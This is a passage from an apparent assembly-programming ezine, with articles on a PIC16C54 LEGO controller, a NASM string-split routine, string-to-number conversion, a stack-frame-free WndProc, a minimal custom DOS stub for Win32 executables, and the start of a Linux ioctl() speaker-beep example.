     RLF     F, d        d := rotate left through carry (F)
     RRF     F, d        d := rotate right through carry (F)
     SLEEP               enter powerdown mode
     SUBWF   F, d        d := F - W              (2's complement)
     SWAPF   F, d        d := swap-nibbles (F)
     TRIS    F           TRIState information for I/O pins
     XORLW   k           W := W XOR k
     XORWF   F, d        d := W XOR F

Especially the "F, d" construct takes some getting used to.

Below is the source for the "LEGO controller":

--------------------------------------------------------------------------
title   "LEGO 003"
subtitl "control LEGO technic devices"

LIST    P=16C54, R=HEX, F=INHX8M, C=120, E=0, N=80
PIC54   equ     1FFH            ; Define Reset Vectors

RTCC    equ     1h              ; define register designators
PC      equ     2h              ; the program counter is a register as well
STATUS  equ     3h              ; F3 Reg is STATUS Reg.
PORT_A  equ     5h
PORT_B  equ     6h              ; I/O Port Assignments

RTCC_tc equ     0Dh             ; time constant for RTCC
count_1 equ     0Eh             ; delay counters and GP registers
count_2 equ     0Fh

file    equ     1
w       equ     0

flag_0  equ     0               ; input bits in RA port
flag_1  equ     1
flag_2  equ     2
flag_3  equ     3

LED_0   equ     0               ; status led 1, in RB Port
LED_1   equ     1               ; status led 2
RL_1    equ     2               ; relays 1 - 3
RL_2    equ     3
RL_3    equ     4
s_clk   equ     5               ; s_clk input
s_data  equ     6               ; s_data input
go      equ     7

delay   movlw   .100            ; mov W with 100 decimal
         movwf   count_1         ; xfer W to register
dela_1  clrf    count_2         ; count_2 = 0
dela_2  decfsz  count_2, file   ; count_2 = count_2 - 1
         goto    dela_2          ; skip this instruction if count_2 = 0, ...
         decfsz  count_1, file   ; ... ending here: count_1 = count_1 - 1
         goto    dela_1          ; skip this instruction when count_1 = 0
         retlw   0               ; ending here, if so.

flash   bcf     PORT_B, LED_1   ; flash LED's 0 and 1 as an acknowledgement
         bsf     PORT_B, LED_0   ; activate the LED's.
         call    delay           ; wait a while
         bcf     PORT_B, LED_0   ; toggle the LED's
         bsf     PORT_B, LED_1
         call    delay           ; wait a second!
         bcf     PORT_B, LED_1   ; turn LED_1 off as well.
         retlw   0               ; return to caller with W = 0

RT_chk  clrwdt                  ; clear the watchdog timer
         btfsc   RTCC, 7         ; RELAY_3 follows bit7 of RTCC
         bcf     PORT_B, RL_3
         btfss   RTCC, 7
         bsf     PORT_B, RL_3
         movf    RTCC, w
         skpz                    ; internal macro for BTFSS  STATUS, 2
         retlw   0
         movf    RTCC_tc, w      ; if
         movwf   RTCC
         retlw   0

start   clrf    RTCC
         clrf    RTCC_tc         ; clear RTCC and RTCC time constant
         movlw   B'00001111'
         tris    PORT_A          ; define port A as inputs
         movlw   B'11100000'
         tris    PORT_B          ; define port B as I/O
         movlw   B'00110111'
         option                  ; define state of WDT, RTCC and prescaler
         movlw   B'00011100'
         movwf   PORT_B          ; initialize port B
         call    flash           ; signal READY
         call    flash
         btfss   PORT_B, s_clk   ; if s_clkline low, check for mode 2 request
         goto    m_chk
repeat  clrwdt                  ; clear watchdog timer
         call    flash
         movf    PORT_A, w       ; read port A into W
         andlw   3               ; mask off sensor inputs
         skpnz                   ; skip next instruction if NonZero
         goto    set_tc          ; flag_0 and _1 zero => define RTCC time
constant
         btfsc   PORT_A, flag_0
         goto    t_left
         btfsc   PORT_A, flag_1
         goto    t_right
         movf    PORT_B, w
         andlw   s_clk + s_data + go
         skpnz                   ; if no RESET condition, skip
         goto    start
         call    RT_chk
         goto    repeat

t_left  btfsc   PORT_A, flag_2  ; if in end position, do not turn at all
         goto    l_exit
         bcf     PORT_B, RL_1    ; else set direction for Turn Left
         bsf     PORT_B, RL_2
         bsf     PORT_B, LED_0   ; show direction with LED's
         bcf     PORT_B, LED_1
chk_fl2 btfsc   PORT_A, flag_2  ; wait until home-position is reached
         goto    l_exit          ; if so, get out
         call    RT_chk          ; if not, check again
         goto    chk_fl2         ; until done
l_exit  bsf     PORT_B, RL_1    ; release relay 1
         bcf     PORT_B, LED_0   ; extinguish light 0
         goto    repeat          ; jump back

t_right btfsc   PORT_A, flag_3  ; if in end position, do not turn at all
         goto    r_exit
         bcf     PORT_B, RL_2    ; else set direction for Turn Right
         bsf     PORT_B, RL_1
         bsf     PORT_B, LED_1   ; show direction with LED's
         bcf     PORT_B, LED_0
chk_fl3 btfsc   PORT_A, flag_3  ; wait until home position reached
         goto    r_exit
         call    RT_chk
         goto    chk_fl3
r_exit  bsf     PORT_B, RL_2    ; deactivate lights and relays
         bcf     PORT_B, LED_1
         goto    repeat

m_chk   clrf    count_1         ; check inputs and make sure there's no glitch
         clrf    count_2
m_chk_1 btfss   PORT_B, s_clk
         decf    count_1, file   ; count pulses s_clkline = low
         decfsz  count_2, file
         goto    m_chk_1
         movf    count_1, w      ; w = low-pulses
         subwf   count_2, w      ; if count_1 <> count_2, glitch occurred
         skpz
         goto    start

set_tc  movf    RTCC, w         ; move current value of RTCC
         movwf   RTCC_tc         ; to time constant register
         goto    repeat

         org     PIC54           ; goto highest word in code space
         goto    start           ; and place the reset vector.

         end

--------------------------------------------------------------------------

If you ever programmed an HP 11 (or 12, 15 or 16) calculator, the conditional
jumps may ring a bell. I don't know how the HP machines handle these jumps,
but the PIC line does the following:

       condition         action by PIC
       ---------         -----------------------------------
         FALSE           execute next instruction
         TRUE            replace next instruction with a NOP

This enables the programmer to make 100% accurate timingloops since there is
no difference between a FALSE and a TRUE condition.

The size of this piece of code is easy to calculate: each line with an
mnemonic is one instructionword. This makes 115 words from the 512 word
program memoryspace, so we have nearly 400 instructionwords wasted.

The PIC's are marvelous chips to bridge the gap between lots and lots of TTL
chips and the overkill of a microcontroller unit with separate RAM, ROM and
I/O. If you want to find out more of this kind of CPU's, visit the website at

         http://www.microchip.com

for PDF datasheets and more. Scenix also has a range of clones out, right now.
They are software compatible but offer more hardware features. Which is not
difficult since the codeword in the design of the PIC's seemed to have been
KISS.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
																				   Splitting Strings
																				   by mammon_

Those familiar with Perl will undoubtedly have used its split() function, which
takes a single string and splits it into multiple strings or into an array,
based on a delimiter character specified in the call. Typical invocations of
split() would be:

      ($field1, $field2, $junk) = split(':', $line);
      @array = split(' ', $line);

In the first line, the source string is split into a maximum of 3 substrings,
creating a new string each time it encounters a colon character; note that the
third string, $junk, contains the entire rest of the string -- only the first 2
colons will be parsed. In the second line, an array of strings is created by
splitting the source string at the space character; since the number of destin-
ation strings is not specified, the array will contain one element for each
substring [read: each string created by splitting the original at a whitespace
character].

Strings and string parsing are notably tedious in assembly. Once learning Perl,
I found that the pseudocode for many of my asm programs started to include a
few calls to 'split', since it is a handy one-line method of string parsing,
applicable to processing command lines, user input, and data files. As a result,
it quickly became necessary to write such a routine.

Being that asm has no inherent array or string tokenizing support, there are
many possible approaches to string splitting. Since the most immediate problem
is that the split() routine does not know in advance how many substrings it
will be creating, there is a temptation to code a strtok() replacement, such
that the first call returns the first substring, and subsequent calls each
return the next substring until the end of the string has been reached:

		   mov ecx, ptrArray
		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ecx], eax
.loop:
		   call split
		   cmp eax, 0
		   je .end
		   mov [ecx], eax
		   add ecx, 4
		   jmp .loop
.end:

This allows for control over the number of substrings created by only calling
split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.

Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:

		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ptrStringArray], eax

This is obviously more elegant on the caller side, but it has a few subtle
problems: first, the control over how many elements is split is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find the end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.

The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:

		   push dword ptrString
		   push dword [delimiter]
		   call split
		   mov [ptrStringArray], eax
		   mov [StringArrayNum], ebx

The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.

The complete split routine is as follows:

#--------------------------------------------------------------------split.asm
;    split( char, string, max_split)
;     Returns address of array of pointers into original string in eax
;     Returns number of array elements in ebx
;     Behavior:
;           split( ":", "this:that:theother:null\0", NULL)
;           "this\0that\0theother\0null\0"
;           ptrArray[0] = [ptrArray+0] = "this\0"
;           ptrArray[1] = [ptrArray+4] = "that\0"
;           ptrArray[2] = [ptrArray+8] = "theother\0"
;           ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free

split:
	 push ebp
	 mov ebp, esp            ;save stack pointer
 	 mov ecx, [ebp + 8] 	 ;max# of splits
 	 mov edi, [ebp + 12] 	 ;pointer to target string
 	 mov ebx, [ebp + 16]  ;splitchar

	 xor eax, eax 		 ;zero out eax for later
	 mov edx, esp 		 ;save current stack pos.
	 push dword edi 		 ;save ptr to first substring
 	 cmp ecx, 0 			 ;is #splits NULL?
	 jnz do_split            ;--no, start splitting
	 mov ecx, 0xFFFF 	 ;--yes, set to MAX

do_split:
	 mov bh, byte [edi]      ;get byte from target string
	 cmp bl, bh 			 ;equal to delimiter?
	 je .splitstr            ;--yes, then split it
	 cmp al, bh 			 ;end of string? [al == 0x0]
	 je EOS                  ;--yes, then leave split()
	 inc edi 				 ;next char
	 loop do_split
.splitstr:
	 mov [edi], byte al    ;replace split delimiter with "\0"
	 inc edi 				 ;move to first char after delimiter
	 push edi 				 ;save ptr to next substring
	 loop do_split 		 ;loop #splits or till EOS

EOS:
	 mov ecx, edx 		 ;edx, ecx == original stack position
	 sub ecx, esp 		 ;get total size of pushed pointers
	 push ecx 				 ;save size
	 call malloc 			 ;allocate that much space for array
	 test eax, eax
	 jz .error
	 pop ecx 				 ;restore size
	 mov edi, eax 		 ;set destination to beginning of array
	 add edi, ecx 		 ;move to end of array
	 shr ecx, 2 			 ;divide total size/4 [= # of dwords to move]
	 mov ebx, ecx 		 ;save count

.store:
	 sub edi, 4 			 ;move to beginning of dword
	 pop dword [edi] 		 ;pop from stack to array
	 loop .store

.error:
	 mov esp, ebp
	 pop ebp
	 ret 					 ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF

The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, the a pointer to the character after the delimiter
is pushed onto the stack:
		   this:that:theother\0
		   ^----------------------This is pushed at the very beginning.
		                          Element#: array[0]
		   this:that:theother\0
		        ^-----------------This is pushed when the first ':' is found.
								        Element#: array[1]
		   this\0that:theother\0
		              ^-----------This is pushed when the second ':' is found
						              Element#: array[2]
         this\0that\0theother\0
		                          The stack now looks like this:
										  --------------[ebp]
										  ptr->string1
										  ptr->string2
										  ptr->string3
										  --------------[esp]
										  The string pointers are then POPed into the
										  array, starting with array[2] and ending with
										  array[0].

Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi is set to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.

To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:

#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'

SECTION .text
main:
	 push dword szString  ;print the original string
	 push dword szOutput
	 call printf
	 add esp, 8

	 push dword ":" 		 ;split the original string
	 push dword szString
	 push dword 0
	 call split
	 add esp, 12

	 mov ecx, ebx
	 mov ebx, eax
printarray: 				 ;print the substrings
	 push ecx 				 ;printf hoses ecx!!!!!
	 push dword [ds:ebx]
	 push dword szOutput
	 call printf
	 add esp, 8
	 add ebx, 4 			 ;skip to next array element
	 pop ecx
	 loop printarray

	 push dword [ptrarray] ;free the array created by split
	 call free
	 add esp, 4

	 push dword 0 		 ;program is done
	 call exit

SECTION .data
szOutput db '%s',0Ah,0Dh,0 							 ;printf format string
szString db 'name:password:UID:GID:group:home',0 ;string to print
#------------------------------------------------------------------------EOF

This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable --the only assumed external routine
is malloc() and -- and can easily be rewritten for the DOS or win32  platforms.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
																    String to Numeric Conversion
                                                    by Laura Fairhead


     Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.

     The routine will scan values in any radix from 0 to 36. Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".

     With this routine there are 2 API's 'scanur' and 'scanu'. 'scanur'
is used to set the radix of the scan conversion. Once this value is
set the main routine 'scanu' can be called freely to scan values from
the string.

     The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear, there is no error, however now the zero flag
indicates if a valid value was actually scanned. This return status
convention gives the most flexibility to the application programmer,
also if a valid value MUST be scanned they can detect the condition
via:-

     CALL NEAR PTR scanu
     JNA error               ;get out if overflow/no value

     The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.


=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
         DB ?

;
;scanur-    set up for scanu routine
;
;entry:     AL=radix
;
;        !! radix must be in range 0<=radix<=36
;
;        !! radix must be set by calling this routine prior to
;        !! using scanu
;
;exit:      (all registers preserved)
;

scanur  PROC NEAR

         MOV BYTE PTR CS:[scanuradi],AL
         RET

scanur  ENDP

;
;scanu-     scan string value returning result
;
;entry:     DS:SI=address of string
;           DF=0
;
;        !! radix must be set previously by calling 'scanur'
;
;exit:      SI=updated to offset of first invalid character
;
;           CF=1
;            a numeric overflow has occurred, ie: the number being scanned
;           has become too big to fit into EAX
;
;           CF=0
;            if ZF=0 then a valid value was scanned, if ZF=1 then no
;           valid digits were scanned
;
;           EAX=converted value
;

scanu   PROC NEAR
;
;preserve registers
;
         PUSH EDX
         PUSH EBX
         PUSH ECX
         PUSH DI
;
;initialise
;  EBX=radix constant
;  EAX=total
;  ECX=0, bits8-24 of ECX always=0 to pad byte digit to dword
;   DI=holds original offset
;
         XOR EAX,EAX
         XOR EBX,EBX
         XOR ECX,ECX
         MOV DI,SI
         MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop:    XCHG EAX,ECX
         LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
         SUB AL,030h
         CMP AL,0Ah
         JC SHORT ko
         ADD AL,030h
;
;map "A"-"Z"-/"a"-"z"- to 10-35- aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
         AND AL,0DFh
         SUB AL,037h
         CMP AL,0Ah
         JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko:     CMP AL,BL
         CMC
ko2:    XCHG EAX,ECX
         JC SHORT erriv
;
;accumalate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
         MUL EBX
         JC errovr
         ADD EAX,ECX
         JNC lop
;
;overflow error
;   adjust SI index to current char and exit, note
;   that CF =1 already
;
errovr: DEC SI
         JMP SHORT don
;
;invalid character
;   main exit point, SI is adjusted to the current char
;   the CMP ensures that CF =0, and also that ZF =1 iff
;   no chars have been read
;
erriv:  DEC SI
         CMP SI,DI
;
;(restore registers and exit)
;
don:    POP DI
         POP ECX
         POP EBX
         POP EDX
         RET

scanu   ENDP

=========END OF CODE=======================================================



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                         WndProc, The Dirty Way
																		   by X-Calibre of Diamond


I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:

     WndProc   PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
         .IF uMsg == WM_DESTROY
             INVOKE PostQuitMessage, NULL
         .ELSE
             INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
             ret
         .ENDIF
             xor   eax, eax
             ret
     WndProc   ENDP

This generates the following code:

     push  ebp                                   ; Create stack frame
     mov   ebp, esp                              ; Why does MASM use 'leave',
                                                 ; but not 'enter'?

     cmp   dword ptr [ebp+0C], WM_DESTROY        ; ebp+0C is uMsg
     jne   @@notDestroy

     push  NULL
     Call  PostQuitMessage
     jmp   @@exitFromDestroy

     @@notDestroy:
     push  [ebp+14]                              ; ebp+14 is lParam
     push  [ebp+10]                              ; epb+10 is wParam
     push  [ebp+0C]                              ; ebp+0C is uMsg
     push  [ebp+08]                              ; ebp+08 is hWnd
     Call  DefWindowProcA                        ; Let Windows handle the other
                                                 ; messages

     leave                                       ; Remove stack frame
     ret   0010                                  ; Remove function arguments
                                                 ; from stack and return

     @@exitFromDestroy:
     xor   eax, eax                              ; Return 'FALSE'
     leave                                       ; Remove stack frame
     ret   0010                                  ; Remove function arguments
                                                 ; from stack and return

Looks nice, and works fine... But, it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be ...after all, this procedure is just a messagehandler, and to keep
your code tidy, you will not put all the code in here, but in separate
procedures,
which you will call from here.

There's only one reason why MASM builds a stack frame for a function: The
function has a prototype for a hll call. A hll call uses the stack to transfer
its arguments.

So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:

     WndProc   PROC
         ...
     WndProc   ENDP

The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.

Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows hll calls always push the arguments in reverse order, and
that the return address is stored on the stack aswell, we can devise these
indices for our parameters:

     hWnd    EQU    dword ptr [esp][4]
     uMsg    EQU    dword ptr [esp][8]
     wParam  EQU    dword ptr [esp][12]
     lParam  EQU    dword ptr [esp][16]

There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.

Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But, there are more registers in the CPU, and most of them are volatile. How
about using esi for example?

     WndProc   PROC
         mov   esi, esp
         hWnd    EQU    dword ptr [esi][4]
         uMsg    EQU    dword ptr [esi][8]
         wParam  EQU    dword ptr [esi][12]
         lParam  EQU    dword ptr [esi][16]

         ...
     WndProc   ENDP

And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:

     WndProc   PROC
         ...
         mov   esp, esi
         ret   4 * sizeof dword      ; As I mentioned earlier, we have to clean
                                     ; the stack ourselves.
                                     ; We had 4 dword arguments, so this does
                                     ; the trick
     WndProc   ENDP

Still less code, and thus faster than the original. And just as rigid. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so should be able to spare the register.

Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:

     WndProc   PROC
         hWnd    EQU    dword ptr [esp][4]
         uMsg    EQU    dword ptr [esp][8]
         wParam  EQU    dword ptr [esp][12]
         lParam  EQU    dword ptr [esp][16]

         .IF uMsg == WM_DESTROY
             INVOKE PostQuitMessage, NULL
         .ELSE
             jmp  DefWindowProc
         .ENDIF

         xor   eax, eax
         ret   4 * sizeof dword      ; Be sure to clean that stack!
     WndProc   ENDP

Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:

     cmp   dword ptr [esp+08], WM_DESTROY
     jne   @@noDestroy

     push  NULL
     Call  PostQuitMessage
     jmp   @@exitFromDestroy

     @@noDestroy:
     Jmp   DefWindowProcA

     @@exitFromDestroy
     xor   eax, eax
     ret   0010

If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?

Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                        Programming the DOS Stub
																		   by X-Calibre of Diamond


As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program can not be run in DOS' message and
exits.

'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!

So, how do we do this then?

Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).

So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.

That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program can not be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! One of the nicer applications of this stub,
which I'm going to explain a bit here.

What is the smallest size for the stub, theoretically speaking?

Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.

Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.

We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing them, we're going to put our code in there. This
is perfectly possible, because you can specify how many relocation table items
your program will be using. We just put in a 0 word at offset 6 in the header,
and the table is ours. Technically speaking, the code is still after the table.
The table just has a length of 0 bytes.

For all you non-DOS coders out there, this is what the program looks like:

;====================================================================stub.asm
.Model Tiny

.code
start:
     push cs      ; Point the data segment to the code segment, since
     pop  ds      ; we're putting the data after the code to save space.

     mov  dx, offset message ; Load pointer to the string for the call.
     mov  ah, 9              ; 9 is the print argument for int 21h.
     int  21h                ; The DOS interrupt.

     mov  ah, 4Ch            ; 4C is the exit argument for int 21h
     int  21h

; Put our string here
message db      "Windows prg!",0Dh,0Ah,'$'

; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF

The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 12 bytes long.
(32+12+15 = offset 59 bytes, so the next byte will be used for the PE offset
DWORD).

This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function. The errorcode actually
depends on the output in al of the int 21h call that prints the string. This
is ofcourse undefined (actually it is 24h in Windows 98).

Microsoft's stub has a defined errorcode of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you, that this code is 1 byte longer, so your message can then be only 14
bytes long in total.

Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.

And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.

offset  length  description                             comments
----------------------------------------------------------------------
2       word    length of last used sector in file      modulo 512
4       word    size of file, incl. header              in 512-pages

The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:

     sectors = CEILING(filesize/512)

CEILING means to round off to nearest natural number above the fraction.

The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:

     lastusedsector = filesize - FLOOR(filesize/512)

The other way around is ofcourse like this:

     filesize = (sectors - 1)*512 + lastusedsector

A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:

offset 2: 0090h
offset 4: 0003h

So the filesize is: (3 - 1)*512 + 144 = 1168

Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?

It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...

Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:

LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE

And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't consider EXE headers with
no relocation table (which could actually be considered a bug, since our EXE
header specifies that the table has length 0, and therefore the code can start
at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the
linker could be considered incompatible).

The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).

Well, anyway... Have fun, and get crazy with your custom DOS stubs!

And remember:

DOS Knowledge is power!



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
																						  Using ioctl()
																				          by mammon_


One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provided a transparent means or reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In linux, handling device parameters through the character and block 'special
file' interface is handled through ioctl().

The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.

One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].

Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
        WARNING: If you use  the  following  information  you  are
        going to burn yourself.

        WARNING:  ioctl's are undocumented Linux internals, liable
        to be changed without warning.  Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'

Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
        KDMKTONE
        Generate  tone  of  specified length.  The lower 16
        bits of argp specify the period  in  clock  cycles,
        and  the  upper  16 bits give the duration in msec.
        If the duration is zero, the sound is  turned  off.
        Control  returns  immediately.  For example, argp =
        (125<<16) + 0x637 would specify the  beep  normally
        associated  with  a  ctrl-G.   (Thus since 0.99pl1;
        broken in 2.1.49-50.)

This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2 			 ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30 	 ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main

section .data
szTTY db '/dev/tty',0

section .text
main:
		   push dword O_RDWR
		   push dword szTTY
		   call open
		   add esp, 8
